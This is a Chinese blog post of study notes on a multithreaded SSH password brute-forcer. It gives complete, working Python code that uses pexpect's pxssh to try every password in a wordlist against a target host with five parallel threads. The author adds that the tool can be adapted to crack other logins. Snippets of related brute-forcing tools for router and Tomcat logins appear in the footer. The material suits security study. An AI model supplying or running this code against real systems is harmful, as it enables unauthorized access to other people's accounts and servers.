Python绝技学习笔记-ssh暴力破解(多线程)

最新推荐文章于 2024-06-14 16:06:25 发布
最新推荐文章于 2024-06-14 16:06:25 发布
阅读量1.1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haodeshua/article/details/94594741
版权

1.开启多线程(t.start()后会继续运行,t.join()是等待子进程运行完毕)

2.Fail用于记录read_nonblocking和pxssh命令符提取失败的次数

3.maxConnections表示最大连接数(多线程,实际上是一个cpu在交替运行。。。。。)

 

代码编写思路:

main()函数

1.解析参数

2.循环遍历密码文件(开启5个线程连接,这里开启线程速度会更快是因为这里要远程连接,等待网络有阻塞,故开启多线程可以加快速度)

3.利用账号密码连接ssh服务器。

s=pxssh.pxssh()

s.login(host,user,password)

有三种返回情况,

登录成功

抛出三种异常,其中两种是因为ssh服务器被大量连接刷爆了,或者是pxxsh命令提示符连接困难。这两种情况都可以等会再连接。当发生五此这种超时错误时,可以过会再手动运行。

附上代码:

from threading import *
from pexpect import pxssh
import sys
import getopt
maxConnections=5
Found=False
connect_lock=BoundedSemaphore(value=maxConnections)
Fails=0
def connect(host,user,password,release):
    global Fails
    global connect_lock
    global Found
    try:
        s=pxssh.pxssh()
        #print user
        #print password
        #print "host" +str(host)
        #print "user"+str(user)
        #print "password"+str(password)        
        s.login(host,user,password)
        print '[+] password Found'+password
        Found=1
    except Exception,e:
        if "read_nonblocking" in str(e):
            Fails+=1
            sleep(5)
            connect(host,user,password,False)
        elif 'synchronize with original prompt' in str(e):
            sleep(1)
            connect(host,user,password,False)
    finally:
        if release:
            connect_lock.release()

def usage():
    print "ssh boom"
    print "-u username"
    print "-p destination passwordfile"
def main():
    if not len(sys.argv[1:]):
        usage()
    try:
        opts,args=getopt.getopt(sys.argv[1:],'u:p:h:')
    except getopt.GetoptError as err:
        print str(err)
        usage()
    for o,a in opts:
        if o in "-u":
            user=a
        elif o in "-h":
            host=a
        elif o in "-p":
            password=a
        else:
            usage()
    if host==None or password==None or user==None:
        usage()
        exit(0)
    fn=open(password,'r')
    for line in fn.readlines():
        #print "hello"
        if Found:
            print "[*] Exiting: Password Found"
            exit(0)
        if Fails>5:
            print "[!] Exiting :Too Many Socket Timeouts"
            exit(0)
        connect_lock.acquire()
        passwd=line.strip('\r').strip('\n')
        print "[-] Testing: " +str(passwd)
        
        t= Thread(target=connect,args=(host,user,passwd,True))
        t.start()

if __name__=='__main__':
    main()

菜鸟实测,加上线程速度确实快了很多

小结:像这类网络,或者其他有阻塞的进程,开线程了可以提高好几倍的速度。其他的账号密码的破解可在此基础上编写,速度应该会比burp快很多

小傅老师
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
写一段python代码,使用多线程建立多个SSH连接
weixin_42610671的博客
02-16 365
以下是使用多线程建立多个SSH连接的Python代码:import threading import paramikodef ssh_connect(ip, username, password, command): client = paramiko.SSHClient() # 设置允许连接不在know_hosts文件中的主机 client.set_missing_hos...
python多线程远程ssh连接 执行命令
风吹过的博客
02-28 2640
python 多线程 远程ssh连接 执行命令
Python武器库开发-武器库篇之SSH服务暴力破解(五十四)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-14 1016
SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络上提供安全的远程登录和文件传输功能。SSH可以在客户端和服务器之间建立安全的通信连接,确保通信数据的机密性和完整性。SSH服务的主要功能包括:远程登录:用户可以通过SSH协议在远程主机上执行命令,就像在本地主机上操作一样。文件传输:SSH可以方便地传输文件和目录,支持上传和下载操作。端口转发:SSH可以在远程主机和本地主机之间建立安全的端口转发通道,用于安全访问远程主机上的服务。
python pexpect_python pexpect模块的使用
weixin_39964660的博客
11-28 216
Pexpect 是一个用来启动子程序并对其进行自动控制的 Python 模块。 Pexpect 可以用来和像 ssh、ftp、passwd、telnet 等命令行程序进行自动交互。pexpect模块在windows功能有限,在linux系统中用得比较多。pexpect有两个类或方法用得比较多,一个是pexpect.run() 和pexpect.spawn()pexpect.run()类似于os.s...
python pexpect模块的使用
weixin_30246221的博客
05-29 272
Pexpect 是一个用来启动子程序并对其进行自动控制的 Python 模块。 Pexpect 可以用来和像 ssh、ftp、passwd、telnet 等命令行程序进行自动交互。 pexpect模块在windows功能有限,在linux系统中用得比较多。 pexpect有两个类或方法用得比较多,一个是pexpect.run()和pexpect.spawn() pexpect.run()类...
python爆破ssh
weixin_35752233的博客
12-30 377
Python 中爆破 SSH 密码通常是不被允许的,因为这种行为可能会对目标主机造成严重损害,并且还可能违反当地的法律法规。 如果你想研究 SSH 密码爆破的原理或者进行安全测试,你可以在拥有授权的情况下使用自己的主机进行测试,或者使用模拟环境进行测试。 如果你真的需要使用 Python 来爆破 SSH 密码,你可以使用模块 paramiko 来尝试连接 SSH 服务器,如果连接成功,就说明密...
python SSH暴力破解工具
听雨轩
01-03 350
一个暴力破解SSHPython代码。来自于 oschina     #!/usr/bin/env python #-*-coding = UTF-8-*- #author@:dengyongkai #blog@:blog.sina.com.cn/kaiyongdeng import sys import os import time #from threadin...
python脚本使用SFTP下载远程计算机文件
weixin_30399797的博客
10-14 147
Using the pexpect module More info about pexpect is at [http://www.noah.org/wiki/pexpect]. #!/usr/bin/env python2.5 """ Usage: %prog [options] file1 [file2] [extra_files] destination D...
通俗易懂,十分钟读懂DES,详解DES加密算法原理,DES攻击手段以及3DES原理。Python DES实现源码
热门推荐
Demonslzh的博客
02-25 3万+
DES(Data Encryption Standard)是一种对称加密算法。本文详细解释DES的算法原理,以及不安全的原因。附Python的实现源码。
C语言实现DES破解(3轮DES差分攻击)
weixin_45688580的博客
03-14 2084
又是密码学作业,这次是一个三轮的DES解密,废话少说,代码如下,每个函数和变量的作用注释的很清楚: P.S.NUM 控制输入明密文对数目,如果同是密码学引论作业就不要看了,不是的话可以copy代码_ //2020/3/15 by小小小小梅 #include<stdio.h> #define NUM 5 //NUM表示输入的明文和密文对数 //PC1,负责去掉奇偶校验位,并且初步...
DES加密算法解析
s2765504026的博客
02-08 4916
一个更严格的定义是严格雪崩效应准则SAC(Strict Avalanche Criterion),参见文献[WEBS86],即对于所有的i和,它要求若S 盒的输入的任意一位i发生变化,输出的任意位i发生变化的可能性为 1/2(参见附录S 中关于S 盒的讨论)尽管 SAC是对S盒而言的,作为个标准它同样适用于整个F函数。其中该系统的密钥位是已知的。函数F给 Feistel密码注入了混淆的成分,F 的明显标准是非线性,任何形式的分析就会越困难,越难将F近似表示为某些线性等式,F的非线性度就越高。
网页密码暴力破解模板,多线程-python
09-05
网页密码暴力破解模板,用python2编写,多线程,可自己调节线程,只是一个模板,需要自己修改里面的关键字,内容等。
python实现多线程暴力破解登陆路由器功能代码分享
12-23
运行时请在其目录下添加user.txt passwd.txt两文件。否则会报错。程序没有加异常处理。代码比较挫….. 复制代码 代码如下: #coding:utf-8- import base64 import urllib2 import Queue import threading,re,sys queue = Queue.Queue() class Rout_thread(threading.Thread):   def __init__(self,queue,passwd):     threading.Thread.__init__(self)     self.que
python3实现多线程破解tomcat简单密码
09-16
python3 http.client库实现的登录验证密码程序。 内含多个密码文件。 for server in ip: print( "[+] Server:",server) print ("[+] Port:",port) print ("[+] Users Loaded:",len(WEAK_USERNAME)) print( "[+] Words Loaded:",len(WEAK_PASSWORD)) print ("[+] Started",timer(),"\n") for I in range(len(accounts)): work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) work.setDaemon(1) work.start() time.sleep(0.1) print( "\n[-] Done -",timer(),"\n" )
对称加密算法(三)(DES)
myDarling_的博客
12-12 1312
DES 加密算法介绍
Python编程实例-Tkinter GUI编程-多线程应用程序
视觉与物联智能
04-17 2308
在本文中,将介绍如何在 Tkinter 应用程序中使用多线程来提高应用程序的响应速度。
python3 tkinter 列表 子窗口 ssh连接mysql
qjd1107的博客
07-08 290
# coding=utf-8 import pymysql from tkinter import * from tkinter import ttk, messagebox from sshtunnel import SSHTunnelForwarder server = SSHTunnelForwarder( ssh_address_or_host=('remote_host', 22), ssh_username='root', ssh_password='passwd',
从DES走到AES(现代密码的传奇之路)
qq_51473302的博客
07-30 1511
多图手撕AES和DES
pxssh connecting to an ssh proxy; Timeout exceeded in read_nonblocking()
Razerware的学习记录
07-12 819
较低版本的pexpect插件会在执行ssh操作时报错,为了防止错误,要使用高于3.1版本的pexpect$ sudo pip install --upgrade pexpect
python学习笔记--皮大庆
08-14
Python学习笔记》是由皮大庆编写的一本关于Python语言学习的教材。在这本书中,作者详细介绍了Python语言的基础知识、语法规则以及常用的编程技巧。 首先,作者简要介绍了Python语言的特点和优势。他提到,Python...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值